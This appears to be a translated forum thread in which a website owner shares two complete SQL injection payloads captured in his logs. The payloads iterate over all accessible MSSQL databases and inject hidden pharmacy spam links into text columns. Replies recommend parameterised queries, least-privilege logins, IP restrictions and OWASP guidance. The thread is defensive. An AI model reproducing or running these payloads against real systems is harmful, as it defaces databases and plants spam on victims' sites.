我在日志中捕获到以下异常：有人试图入侵我的网站。
mt: 15867';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in
('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '[email protected]+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case
ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else
''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in
(2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br/> sess: 2<
攻击者的注入以 `';declare` 开头，以 `--` 结尾。我所有的 SQL 查询都应该已经参数化了，但如果并非如此，我需要消除这种威胁。
我最好的选择是什么？我的数据库有一个专用的“web”登录账户。对这个 Web 登录账户的权限实施最小化，或拒绝其访问特定 SQL 对象的最佳做法是什么？
这个人想做什么？下面是另一次入侵尝试：
;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into
@w;while @@FETCH_STATUS=0 begin set @s='begin try use '[email protected]+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''tadalafil 40mg ''+char(60)+''a
href="http:''+char(47)+char(47)+''www.guitar-frets.com''+char(47)+''blog''+char(47)+''page''+char(47)+''synthroid-200mcg.aspx"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''levofloxacin 750mg'''' when 1 then ''''guitar-frets.com'''' else ''''guitar-frets.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' valacyclovir
pill''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin
exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br
这是我日志的一个快照。如果你从下往上看，可以看到这个攻击者正在逐个参数尝试注入他的代码。
其实很简单：正是为了这个原因，请确保你的 SQL 查询都已参数化。创建一个只能访问特定数据库（或若干数据库）的用户账户。将安装了 SQL Server 的服务器配置为只接受来自指定 IP 地址的连接，拒绝其他所有连接。 –
明白了。你是否在使用 VPN？有时这类情况发生在通过服务器进行备份抓取时。 – hemanjosko
OWASP 基金会提供了你需要了解的一切：https://www.owasp.org/index.php/Category:OWASP_Guide_Project –